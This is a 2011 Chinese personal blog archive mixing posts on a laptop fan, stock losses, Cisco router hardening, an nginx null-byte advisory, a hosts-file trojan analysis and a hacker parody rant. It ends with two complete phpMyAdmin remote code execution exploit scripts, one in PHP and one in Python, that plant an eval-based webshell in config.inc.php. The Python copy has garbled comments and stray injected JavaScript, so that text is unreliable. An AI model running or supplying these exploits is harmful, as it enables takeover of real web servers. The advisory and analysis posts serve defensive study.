NetKnave 's BLog

给T410换了个风扇

Fri, 27 Apr 2012 23:34:31 +0000

这个T410买来也用了不少日子了，跟着我也是受罪啊，基本不关机的真是受累了。
最近发现这风扇不行了，随便开几个网页啊程序啊啥的温度立马上来了声音还大。
果断换之。
TMALL上买了个风扇155+7块钱运费1天就到了。
花了十几分钟轻松换完，果然是清爽多了。
声音小了温度也正常了。NICE啊。。。。

上几张换下来的图，灰还真不少。。。

Tags - t410

今年赚钱太难了

Tue, 27 Sep 2011 21:17:32 +0000

转自爱美股。。。难呐

你要看上中概热门，中概血崩，然后你觉得大中概比较靠谱，看到SINA, BIDU都满意，
一买一捂，BIDU二探115，SINA二探80-。你给我说说怎么赚钱。

然后你觉得有QE在，买点白银抗通涨，四月血崩一次，要么亏得不玩了，要么捂到9月
出水了，再给你来一回更猛的，直接回30。然后你觉得黄金保险吧，1700左右上路，
1800卖了小赚，没准1700多又上路，现在也给你把利润赔没了。

然后你想着苹果总没错吧，妈的今年都二三回去315了，加上JOBS一走，你吓得又出货
了，出了不烧就不错了，看到人家飞到400，谁给我说说JOBS走了还有信心捂苹果的。

然后你看铀矿不错，日本地震给你一脚，几位三块多买URRE, DNN的哥么不知道哪去了
，现在都是几毛钱了。

那年初大牛们，都说BAC去18吧，你说我不看帐户了，捂这全美最大银行，了不起他去
了10块以下我加仓ALL IN。尼玛的居然看到了6块，还要破产。

NFLX是潜力股，你120进130出，180进200出，260进300出，以为自己是股神了，你给我
演示一下从300到120这一路上，你是怎么微操赚钱的。第一次暴跌你SHORT被爆，第二
次暴跌你LONG被爆，第三次暴跌你只能看风景了。

8月连跌8天，多少人给你说抢反弹，牛市啊，CORRECTION，见DIP就上，你进去抢了，
乖乖，DOW飞流直下二千点，没过2008没见过世面啊，再不割肉真是有INNER PEACE。

然后尼玛的你怒了，去捂帮捂LOSER，太阳能衰是吧，咱们7块买LDK，还不一会就回十
块，前一阵还到15呢，现在给你50% OFF。石油危机，油价上涨，这玩意总是大家需要
的吧，上油工皮克PGH, PBR，一会飞到14和40多，美啊美啊，转眼一个9块一个23，你
给我演示一下这一路怎么赚的。

然后你看到科技股火热，AAPL买不起或吓到了，AAPL的好伙伴QCOM牛啊，一定破60，身
边的朋友都五十多买的，等着过60，现在50，只能INNER PEACE了。SPRD巨牛，被浑水
一搞去了九块你还不割？FIO是存储巨头，非死不可都得给面子，出来30现在半价。那
尼玛的非死不可的弟弟LNKD总牛了吧，谁给说说LNKD怎么赚到钱的。后来中国版的非死
不可来了，看YOKU和DANG IPO的时候热火，RENN18出来，大家都抢了，我等等，12够便
宜了吧，转眼6块，尼玛的OPTION也没有这么赔的。一加一捂，回十多了，出水咱就卖
，真是好样的，等等，怎么5块了。

然后你再说，夏天电影火热，经济不好总得看片吧，哈里波波最后一部来了，还有功夫
熊猫这丫的，IMAX咱们抄，30多一股根本不贵，等着见50，看看IMAX人山人海的，你还
自觉得FA做得不错，尼玛的转眼庄跑了，变15了，IMAX还那么人，怎么就5折了呢。DWA
也不知道是熊猫不给力还是怎么回事，也打了个大折。

咖啡火你买JVA，跌了赔了你烧GMCR，这不都是股版大虾干的事嘛，谁给说说怎么赚的。

开始专注大牛PICK,AMD MU剑指15，买了立马去了6和7。NCT买的比大牛成本低，五块买
的现在快4块。ALL IN HIG，眼看飓风过了要反弹了，也不知怎么下弹到16的。跟着
HOBO买TZA, FAZ，能不被烧活下来的真不多。太多太多辛酸的故事就不说了，等大家来
总结

以上有一半都发生在本人身上，其它也在脑中模拟操作，PICK没有人身攻击的意思，
PICK本身都是没问题的，只是不知道入点和出点。今年赚钱的牛给我们讲讲吧。最近我
最不爱听到的教育就是BUY AND HOLD，我觉得我心中的几个大牛告诉我，STAY AWAY，
等市场转向再回来，这才是散户最佳操作。BUY AND HOLD上面这些玩意，你给我说说怎
么赚钱

思科路由器安全加固方案（南方电网预实施方案）

Mon, 05 Sep 2011 23:35:35 +0000

http://www.youxia.org/2011/08/Route-JiaGu.html

一、控制层面主要安全威协与应对原则

网络设备的控制层面的实质还是运行的一个操作系统，既然是一个操作系统，那么，其它操作系统可能遇到的安全威胁网络设备都有可能遇到；总结起来有如下几个方面：

1、系统自身的缺陷：操作系统作为一个复杂系统，不论在发布之前多么仔细的进行测试，总会有缺陷产生的。出现缺陷后的唯一办法就是尽快给系统要上补丁。 Cisco IOS/Catos与其它通用操作系统的区别在于，IOS/Catos需要将整个系统更换为打过补丁的系统，可以查询http: //www.cisco.com/en/US/customer/products/prod_security_advisories_list.html 取得cisco最新的安全公告信息与补丁信息。

2、系统缺省服务：与大多数能用操作系统一样，IOS与CatOS缺省情况下也开了一大堆服务，这些服务可能会引起潜在的安全风险，解决的办法是按最小特权原则，关闭这些不需要的服务。

3、弱密码与明文密码：在IOS中，特权密码的加密方式强加密有弱加密两种，而普通存取密码在缺省情况下则是明文；

4、非授权用户可以管理设备：既可以通过telnet\snmp通过网络对设备进行带内管理，还可以通过console与aux口对设备进行带外管理。缺省情况下带外管理是没有密码限制的。隐含较大的安全风险；

5、 CDP协议造成设备信息的泄漏；

6、 DDOS攻击导致设备不能正常运行，解决方案，使用控制面策略，限制到控制层面的流量；

7、发生安全风险之后，缺省审计功能。

二、 Cisco IOS加固

对于12.3(4)T之后的IOS版本，可以通过autosecure命令完成下述大多数功能，考虑到大部分用户还没有条件升级到该IOS版本，这里仍然列出需要使用到的命令行：

1、禁用不需要的服务：
no ip http server　　 //禁用http server，这玩意儿的安全漏洞很多的
no ip source-route　　 //禁用IP源路由，防止路由欺骗
no service finger //禁用finger服务　
no ip bootp server　　　//禁用bootp服务
no service udp-small-s //小的udp服务
no service tcp-small-s //禁用小的tcp服务

2、关闭CDP
no cdp run //禁用cdp

3、配置强加密与启用密码加密：
service password-encryption　//启用加密服务，将对password密码进行加密
enable secret asdfajkls　　　//配置强加密的特权密码
no enable password　　　　　 //禁用弱加密的特权密码

4、配置log server、时间服务及与用于带内管理的ACL等，便于进行安全审计
service timestamp log datetime localtime //配置时间戳为datetime方式，使用本地时间
logging 192.168.0.1 //向192.168.0.1发送log
logging 192.168.0.2 //向192.168.0.2发送log
access-list 98的主机进行通讯
no access-list 99 //在配置一个新的acl前先清空该ACL
access-list 99 permit 192.168.0.0 0.0.0.255
access-list 99 deny any log //log参数说明在有符合该条件的条目时产生一条logo信息
no access-list 98 //在配置一个新的acl前先清空该ACL
access-list 98 permit host 192.168.0.1
access-list 98 deny any log //log参数说明在有符合该条件的条目时产生一条logo信息
!
clock timezone PST-8 //设置时区
ntp authenticate　　　　　　 //启用NTP认证
ntp authentication-key 1 md5 uadsf //设置NTP认证用的密码，使用MD5加密。需要和ntp server一致
ntp trusted-key 1　　　　　　　　　　//可以信任的Key.
ntp acess-group peer 98 //设置ntp服务，只允许对端为符合access-list 98条件的主机
ntp server 192.168.0.1 key 1　　　　 //配置ntp server，server为192.168.0.1，使用1号key做为密码　

5、对带内管理行为进行限制：
snmp-server community HSDxdf ro 98//配置snmp只读通讯字，并只允许access-list 98的主机进行通讯
line vty 0 4
access-class 99 in //使用acl 99来控制telnet的源地址
login
password 0 asdfaksdlf　　　　//配置telnet密码
exec-timeout 2 0　　　　　　 //配置虚终端超时参数，这里是2分钟
!

6、对带外管理行为进行限制：
line con 0
login
password 0 adsfoii //配置console口的密码
exec-timeout 2 0　　　　　　 //配置console口超时参数，这里是两分钟
!
line aux 0
transport input none
password 0 asfdkalsfj　　　　
no exec
exit

7、应用control-plane police，预防DDOS攻击(注：需要12.2(18)S或12.3(4)T以上版本才支持)
允许信任主机(包括其它网络设备、管理工作站等)来的流量:
access-list 110 deny ip host 1.1.1.1 any
access-list 110 deny ip 2.2.2.0 255.255.255.0 any
.....
access-list 110 deny ip 3.3.3.3 any
限制所有其它流量
access-list 110 permit ip any any
!
class-map control-plane-limit
match access-group 110
!
policy-map control-plane-policy
class control-plane-limit
police 32000 conform transmit exceed drop
!
control-plane
service-policy input control-plane-policy

三、 Cisco CatOS加固

1、禁用不需要的服务：
set cdp disable //禁用cdp
set ip http disable 　　 //禁用http server，这玩意儿的安全漏洞很多的

2、配置时间及日志参数，便于进行安全审计：
set logging timestamp enable //启用log时间戳
set logging server 192.168.0.1 //向192.168.0.1发送log
set logging server 192.168.0.2 //向192.168.0.2发送log!
set timezone PST-8 //设置时区
set ntp authenticate enable　　　　　　 //启用NTP认证
set ntp key 1 md5 uadsf //设置NTP认证用的密码，使用MD5加密。需要和ntp server一致
set ntp server 192.168.0.1 key 1　//配置ntp server，server为192.168.0.1，使用1号key做为密码　
set ntp client enable //启用ntp client

3、限制带内管理：

set snmp community HSDxdf //配置snmp只读通讯字
set ip permit enable snmp //启用snmp访问控制
set ip permit 192.168.0.1 snmp　 //允许192.168.0.1进行snmp访问
set ip permit enable telnet //启用telnet访问控制
set ip permit 192.168.0.1 telnet　 //允许192.168.0.1进行telnet访问
set password //配置telnet密码
set enable 　　 //配置特权密码
set logout 2 　　 //配置超时参数，2分钟
Tags - cisco

Nginx空字节执行任意代码(php)漏洞

Thu, 25 Aug 2011 23:34:18 +0000

SSV-ID: 20898
SEBUG-Appdir: Nginx
发布时间: 2011-07-20
影响版本:
nginx 0.5.*
nginx 0.6.*
nginx 0.7 <= 0.7.65
nginx 0.8 <= 0.8.37
漏洞描述:
Possible Arbitrary Code Execution with Null Bytes, PHP, and Old Versions of nginx

In vulnerable versions of nginx, null bytes are allowed in URIs by default (their presence is indicated via a variable named zero_in_uri defined in ngx_http_request.h).

Individual modules have the ability to opt-out of handling URIs with null bytes. However, not all of them do; in particular, the FastCGI module does not.
<*参考
https://nealpoole.com/blog/2011/07/possible-arbitrary-code-execution-with-null-bytes-php-and-old-versions-of-nginx/
*>
测试方法:
[sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
The attack itself is simple: a malicious user who makes a request to http://example.com/file.ext%00.php causes file.ext to be parsed as PHP.

If an attacker can control the contents of a file served up by nginx (ie: using an avatar upload form) the result is arbitrary code execution. This vulnerability can not be mitigated by nginx configuration settings like try_files or PHP configuration settings like cgi.fix_pathinfo: the only defense is to upgrade to a newer version of nginx or to explicitly block potentially malicious requests to directories containing user-controlled content.
SEBUG安全建议:
解决方案

升级nginx版本
http://nginx.org
// sebug.net [2011-08-25]

Can we believe our eyes?

Thu, 11 Aug 2011 18:07:47 +0000

Several days ago, one of our customers submitted a sample (SHA1: fbe71968d4c5399c2906b56d9feadf19a35beb97, detected as TrojanDropper:Win32/Vundo.L). This trojan hijacks the hosts “vk.com” and “vkontakte.ru” (both social networking sites in Russia)and redirects them to 92.38.209.252, but achieves this in an unusual way.

A common method used to hijack a website and redirect it to a site of the attacker’s choice is to add an entry in the Windows hosts file located in the %SystemRoot%\system32\drivers\etc directory. However, when we open this file on an affected computer, it doesn’t contain any entries related to “vk.com” and “vkontakte.ru”, as you can see in the following example:

But when we show hidden files, we can see another “hosts” file. It is hidden, as in the following example:

There are two files with exactly the same name, “hosts”, in the etc directory! How can this happen?

As we know, it is not possible for a directory to contain two files with the same name. When we copy the file names to notepad, save them as a Unicode text file and open them with a hex editor we see the following (the upper is for the first “hosts” file, the lower is for the second “hosts” file):

For Unicode (UTF-16), the 0x006F is the same as 0x6F in ASCII, which is the character “o”. But what’s the 0x043E in Unicode? We can find it in Unicode chart table (Range: 0400-04FF). The following is part of this table.

We can see that Unicode 0x043E is a Cyrillic character, and it looks very much like the English character “o”.
So the hidden “hosts” file is the real hosts file in fact. When we open this file, we can see that two entries have been added to the end of the file:

Mystery solved!

This is not the first time we’ve seen a hacker using Unicode characters to mislead people. In Aug 2010, a Chinese hacker disclosed a trick with a Unicode control character used to mislead people into running an executable file. Hackers use Unicode control characters 0x202E (RLO) to reverse parts of a special file name, which changes the look of the file name in Windows Explorer.

For example, there is a file named as “picgpj.exe”, as the following:

The “gpj.exe” part of this name is specially crafted. When inserting an RLO character before “gpj.exe” in this name, the whole name appears as the following:

Hackers also usually use a picture as the file icon. Unwary people treat this file as a picture, and blindly ouble-click to open it, thus running the executable. Obviously, this type of trick is useless for Unicode aware programs, but it is not easy for the eyes of people to identify the problem.

Can we believe our eyes? The answer is... not always.

Zhitao Zhou

清理链接

Mon, 08 Aug 2011 16:33:29 +0000

估计清完没二个链接了..

当鹰犬的孩纸你们桑不起啊！！！！！！！！！

Tue, 26 Jul 2011 21:29:25 +0000

PS：我擦。。确实有这么坑爹。。看完这个贴子。想起当年。。。真是内牛满面啊

当鹰犬的孩纸你们伤不起啊！！！！有木有啊！！！！！有木有啊！！！！！！！
尼玛说起来好歹也是为国家效力啊！！！！！在古代那是光宗耀祖的事情啊！！！！！有木有啊！！！！！有木有啊！！！！！！！
可特么现在有点前途有点觉悟的孩纸都不愿进国家队啊，这是为神马啊！！！！为神马啊！！！！！神马啊！！！！！！！！
尼玛搞的都是高科技啊，神马F22啊！！！！！FBI啊！！！！！！日本自慰队啊！！！！！！！达赖喇嘛啊！！！！！！有木有啊！！！！！有木有啊！！！！！！！
尼玛老子就是一垃圾邮件群发机啊！！！！！！有木有啊！！！！！有木有啊！！！！！！！
天天拿着个hotmail，gmail，yahoo的插死死给人家发信啊！！！！！！有木有啊！！！！！有木有啊！！！！！！！
一天要发1W多封垃圾邮件出去啊！！！！！！尼玛的yahoo的服务器内牛满面啊，每天要封老子10多个账号啊！！！！！！有木有啊！！！！！有木有啊！！！！！！！
达赖内牛满面啊！！！！老子中你的马好不好，不要再给老子发邮件了啊！！！！！有木有啊！！！！！有木有啊！！！！！！！
老子们的辛酸又有谁知道啊！！！！！！有木有啊！！！！！有木有啊！！！！！！！
尼玛天天巴望着上头发点0day啊，网马啊，插死死啊，溢出啊！！！！！有木有啊！！！！！有木有啊！！！！！！！
特么盼猩猩盼熊猫，盼来一个J8网马，卡得要死的啊！！！！！！挂IE的啊！！！！！！！有木有啊！！！！！有木有啊！！！！！！！
还特么要自己免杀啊！！！！！！！有木有啊！！！！！有木有啊！！！！！！！
尼玛从日站到挂马，到日内网，到特么下资料，都鸡巴一个人搞啊！！！！！有木有啊！！！！！有木有啊！！！！！！！
特么真当老子是全能黑客啊！！！！！！有木有啊！！！！！有木有啊！！！！！！！
尼玛的好不容易日进去，找东西找尼玛半天啊！！！！！！有木有啊！！！！！有木有啊！！！！！！！
尼玛国外的公司，目录那叫一个乱啊！！！！！有木有啊！！！！！有木有啊！！！！！！！
尼玛发现一个目录全是wmv，以为是特么产品说明啊！！！！！！结果尼玛下回来全是毛片啊！！！！！3P啊，人兽啊，SM啊！！！！！！！有木有啊！！！！！有木有啊！！！！！！！
尼玛1G的资料要下半年啊，断断续续啊！！！！！！寝室的还在下毛片啊！！！！！！有木有啊！！！！！有木有啊！！！！！！！
尼玛每天半夜睡不着啊，提心吊胆啊，盯着人家屏幕看人家上班玩扫雷啊！！！！！！机器一掉今年的奖金又打水漂啊！！！！！有木有啊！！！！！有木有啊！！！！！！！
特么一会日本时间，一会美国时间啊！！！！！！有木有啊！！！！！有木有啊！！！！！！！
搞到一半遇到网管啊，特么一脚就给你飞出来啊！！！！也不J8管你搞得多辛苦啊！！！！！！有木有啊！！！！！有木有啊！！！！！！！
尼玛提心吊胆好多天啊，出事国家也不保你啊，还特么要被CIA跨国追杀啊！！！！跨国啊！！！！！比特么跨省高了几个档次啊！！！！！有木有啊！！！！！有木有啊！！！！！！！
尼玛好不容易东西下完啊！！！！！！一年凑齐几个T的资料交给上面啊！！！！！上面一句话没用啊！！！！！没用啊！！！！！！就特么一句话啊，你今年一年白干了啊！！！！！！有木有啊！！！！！有木有啊！！！！！！！
特么的完成一个指标啊！！！！！说给你100W啊！！！！！！特么20个人分啊！！！！！！还要被boss扣一笔啊！！！！！到手的连交房租都不够啊！！！！！！有木有啊！！！！！有木有啊！！！！！！！
尼玛的《奸20》试飞啊！！！！上面的零件全是老子们的血汗啊！！！冒着生命危险换来的啊！！！！！！有木有啊！！！！！有木有啊！！！！！！！
关那些老砖家老叫兽屁事啊！！！！！！有木有啊！！！！！有木有啊！！！！！！！
那些中科院的老砖家啊，老叫兽啊，都特么吃屎的货色啊！！！！！！就特么会骗钱骗炮打啊，毛都不会啊！！！！！！特么随便申请一个鸡巴项目啊！！！！上面几亿的资金往那边拨啊！！！！！！有木有啊！！！！！有木有啊！！！！！！！
尼玛的老子这些真正做事的人啊！！！！！一个月给你几千块钱就打发了啊，跟打发叫花子一样啊！！！！！！特么的给朝廷办事啊！！！饿不死就行了啊！！！！！有木有啊！！！！！有木有啊！！！！！！！
特么的人家刷库黑客啊，一个update啊，几百W就来了啊！！！！！老子们累死累活干一辈子啊，功劳都被老叫兽们领走了啊！！！！！！！！！！！！有木有啊！！！！！有木有啊！！！！！！！
孩纸们啊！！！！！血的教训啊！！！！肿么也不能去当鹰犬为朝廷做事啊！！！！！朝廷不是人待的地方啊！！！！！！！！
刷库被逮到撑死坐几年啊！！！！！几年后又是一条好汉啊！！！！！！！！不要听信鹰犬们的花言巧语啊！！！！！！！！切记切记啊！！！！！！！！！

本文摘自互联网

但无论如何请不要对爱情偷懒

Mon, 25 Jul 2011 11:39:19 +0000

当两个人在一起比较久女的会越来越爱男的男的越来越随便男的会説女的老是胡思乱想女的就説男的已经变了不像以前那麽宠她其实大家都没变只是时间变了因为彼此关係变亲密了习惯对方所以不会再像热恋那样所以女的会胡想但无论如何请不要对爱情偷懒否则只要平澹然后矛盾争吵再到分手

phpMyAdmin 3.x Swekey Remote Code Injection Exploit

Sun, 10 Jul 2011 17:39:45 +0000

# Exploit Title: phpMyAdmin 3.x Swekey Remote Code Injection Exploit

# Date: 2011-07-09

# Author: Mango of ha.xxor.se

# Version: phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1

# CVE : CVE-2011-2505, CVE-2011-2506

# Advisory: http://www.xxor.se/advisories/phpMyAdmin_3.x_Multiple_Remote_Code_Executions.txt

# Details: http://ha.xxor.se/2011/07/phpmyadmin-3x-multiple-remote-code.html

*/

echo php_sapi_name()!=='cli'?'

':'';?>  

              .  

       ,      )\     .  

  .  ,/)   , /  ) ,  )\  

  )\(  /)/( (__( /( /  )          __      __              ________        __                    __  

 /  \  (   )|  |)  \  /          |  |\  /|  |            |  |  |  |      |  |                  (__)  

(  ______ / |  |_____(  ______   |  | \/ |  |  __    __  |  |__|  |   ___|  |  __ ___________   __   __ _____  

 \|  | \  \ |  |  |  |)|  | \  \ |  |    |  | |  |  |  | |  |  |  | /  / |  | |  |  |  |  |  | |  | |  |  |  |  

  |  |_/__/ |__|  |__| |  |_/__/ |__|    |__| |__|__|  | |__| [][]|[]__[]|[][]|_[]  |_[][]|_[] [][][]__|  |__|  

==|__|=================|__|=========================|__|======[]====[][]=|[]|[]=[]===[]==[]=[]===[]==============      

   phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1              [][]   []   [][]  []   []  [] []   []  

   Remote Code Injection                                      []    [][]  []    []   []  [] []   []  

   http://ha.xxor.se                                          [][] []  [] []    [][]  [][]  []   []   

     _   _  ___ __ ____ __ ___  ___         

    | |-| || _ |\   /\   /| _ ||   )        

    |_|-|_||_|_|/_._\/_._\|___||_|_\        

  ___  ___  ___ _  _  ___     ___ __ __    

 (  < | [_ /  /| || ||   )(_)|   |\ | /  

  >__)|_[_ \__\|____||_|_\|_| |_|  |_|  

   

Use responsibly.  

   

':'';  

   

if(php_sapi_name()==='cli'){  

    if(!isset($argv[1])){  

        output("   Usage\n    ".$argv[0]." http://example.com/phpMyAdmin-3.3.9.2");  

        killme();  

    }  

    $pmaurl = $argv[1];   

}else{  

    $pmaurl = isset($_REQUEST['url'])?$_REQUEST['url']:'';  

}  

$code   = 'foreach($_GET as $k=>$v)if($k==="eval")eval($v);';  

$cookie = null;  

$token  = null;  

if(!function_exists('curl_init')){  

    output('[!] Fatal error. Need cURL!');  

    killme();  

}  

$ch     = curl_init();  

$debug  = 0;  

if(php_sapi_name()!=='cli'){  

?>  

  

URL:  Example: http://localhost:8080/phpMyAdmin-3.3.9.2
  

  

  

  


if(!isset($_REQUEST['submit']))killme(true);  

}  

   

output("[i] Running...");  

   

// Start a session and get a token  

curl_setopt_array($ch, array(  

    CURLOPT_URL => $pmaurl.'/setup/index.php',  

    CURLOPT_HEADER => 1,  

    CURLOPT_RETURNTRANSFER => 1,  

    CURLOPT_TIMEOUT => 4,  

    CURLOPT_SSL_VERIFYPEER => false,  

    CURLOPT_SSL_VERIFYHOST => false  

));  

output("[*] Contacting server to retrive session cookie and token.");  

   

$result = curl_exec($ch);  

if(404 == curl_getinfo($ch, CURLINFO_HTTP_CODE)){  

    output("[!] Fail. $pmaurl/setup/index.php returned 404. The host is not vulnerable or there is a problem with the supplied url.");  

    killme();  

}  

if(!$result){  

    output("[!] cURL error:".curl_error($ch));  

    killme();  

}  

if(false !== strpos($result, 'Cannot load or save configuration')){  

    output("[!] Fail. Host not vulnerable. Web server writable folder $pmaurl/config/ does not exsist.");  

    killme();  

}  

   

// Extract cookie  

preg_match('/phpMyAdmin=([^;]+)/', $result, $matches);  

$cookie = $matches[1];  

output("[i] Cookie:".$cookie);  

// Extract token  

preg_match('/(token=|token" value=")([0-9a-f]{32})/', $result, $matches);  

$token = $matches[2];  

output("[i] Token:".$token);  

   

// Poison _SESSION variable  

curl_setopt($ch, CURLOPT_URL, $pmaurl.'/?_SESSION[ConfigFile][Servers][*/'.urlencode($code).'/*][port]=0&session_to_unset=x&token='.$token);  

curl_setopt($ch, CURLOPT_COOKIE, 'phpMyAdmin='.$cookie);  

output("[*] Contacting server to inject code into the _SESSION[ConfigFile][Servers] array.");  

if(!$result = curl_exec($ch)){  

    output("[!] cURL error:".curl_error($ch));  

    killme();  

}  

   

//echo htmlspecialchars($result,ENT_QUOTES);  

   

// Save file  

curl_setopt($ch, CURLOPT_URL, $pmaurl.'/setup/config.php');  

curl_setopt($ch, CURLOPT_POST, 1);  

curl_setopt($ch, CURLOPT_POSTFIELDS, 'submit_save=Save&token='.$token);  

output("[*] Contacting server to make it save the injected code to a file.");  

if(!$result = curl_exec($ch)){  

    output("[!] cURL error:".curl_error($ch));  

    killme();  

}  

   

//echo htmlspecialchars($result,ENT_QUOTES);  

   

curl_setopt($ch, CURLOPT_URL, $pmaurl.'/config/config.inc.php?eval=echo%20md5(123);');  

curl_setopt($ch, CURLOPT_POST, 0);  

output("[*] Contacting server to test if the injected code executes.");  

if(!$result = curl_exec($ch)){  

    output("[!] cURL error:".curl_error($ch));  

    killme();  

}  

if(preg_match('/202cb962ac59075b964b07152d234b70/', $result)){  

    output("[!] Code injection successfull. This instance of phpMyAdmin is vulnerable!");  

    output("[+] Use your browser to execute PHP code like this $pmaurl/config/config.inc.php?eval=echo%20'test';");  

}else{  

    output("[!] Code injection failed. This instance of phpMyAdmin does not apear to be vulnerable.");  

}  

   

   

curl_close($ch);  

   

function output($msg){  

    echo php_sapi_name()!=='cli'?htmlspecialchars("$msg\n",ENT_QUOTES):"$msg\n";  

    flush();  

}  

   

function killme(){  

    output("[*] Exiting...");  

    echo php_sapi_name()!=='cli'?'':'';  

    die();  

}  

   

echo php_sapi_name()!=='cli'?'':'';?>

Tags - phpmyadmin

phpMyAdmin3 (pma3) Remote Code Execution Exploit

Sun, 10 Jul 2011 17:35:53 +0000

#!/usr/bin/env python

# coding=utf-8

# pma3 - phpMyAdmin3 remote code execute exploit

# Author: wofeiwo

/*
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();

/* ]]> */

>

# Thx Superhei

# Tested on: 3.1.1, 3.2.1, 3.4.3

# CVE: CVE-2011-2505, CVE-2011-2506

# Date: 2011-07-08

# Have fun, DO *NOT* USE IT TO DO BAD THING.

################################################



# Requirements: 1. "config" directory must created&writeable in pma directory.

#               2. session.auto_start = 1 in php.ini configuration.





import os,sys,urllib2,re



def usage(program):

    print "PMA3 (Version below 3.3.10.2 and 3.4.3.1) remote code

execute exploit"

    print "Usage: %s " % program

    print "Example: %s http://www.test.com/phpMyAdmin" % program

    sys.exit(0)



def main(args):

    try:

        if len(args) < 2:

            usage(args[0])



        if args[1][-1] == "/":

            args[1] = args[1][:-1]



        # ��һ��ȡtoken��sessionid��sessionid��phpMyAdmin��ֵ��һ�µ�

        print "[+] Trying get form token&session_id.."

        content = urllib2.urlopen(args[1]+"/index.php").read()

        r1 = re.findall("token=(\w{32})", content)

        r2 = re.findall("phpMyAdmin=(\w{32,40})", content)



        if not r1:

            r1 = re.findall("token\" value=\"(\w{32})\"", content)

        if not r2:

            r2 = re.findall("phpMyAdmin\" value=\"(\w{32,40})\"", content)

        if len(r1) < 1 or len(r2) < 1:

            print "[-] Cannot find form token and session id...exit."

            sys.exit(-1)



        token = r1[0]

        sessionid = r2[0]

        print "[+] Token: %s , SessionID: %s" % (token, sessionid)



         # �ڶ��ͨ��swekey.auth.lib.php��$_SESSION��ֵ

        print "[+] Trying to insert payload in $_SESSION.."

        uri = "/libraries/auth/swekey/swekey.auth.lib.php?session_to_unset=HelloThere&_SESSION[ConfigFile0][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA&_SESSION[ConfigFile][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA"

        url = args[1]+uri



        opener = urllib2.build_opener()

        opener.addheaders.append(('Cookie', 'phpMyAdmin=%s;

pma_lang=en; pma_mcrypt_iv=ILXfl5RoJxQ%%3D; PHPSESSID=%s;' %

(sessionid, sessionid)))

        urllib2.install_opener(opener)

        urllib2.urlopen(url)



        # ��setup��ȡshell

        print "[+] Trying get webshell.."

        postdata =

"phpMyAdmin=%s&tab_hash=&token=%s&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save"

% (sessionid, token)

        url = args[1]+"/setup/config.php"



        # print "[+]Postdata: %s" % postdata

        urllib2.urlopen(url, postdata)

        print "[+] All done, pray for your lucky!"



        # ��Ĳ��shell

        url = args[1]+"/config/config.inc.php"

        opener.addheaders.append(('Code', 'phpinfo();'))

        urllib2.install_opener(opener)

        print "[+] Trying connect shell: %s" % url

        result = re.findall("System \\
class=\"v\"\>(.*)\\", urllib2.urlopen(url).read())

        if len(result) == 1:

            print "[+] Lucky u! System info: %s"  % result[0]

            print "[+] Shellcode is: eval(getenv('HTTP_CODE'));"



        else:

            print "[-] Cannot get webshell."



    except Exception, e:

        print e



if __name__ == "__main__" : main(sys.argv)

Tags - phpmyadmin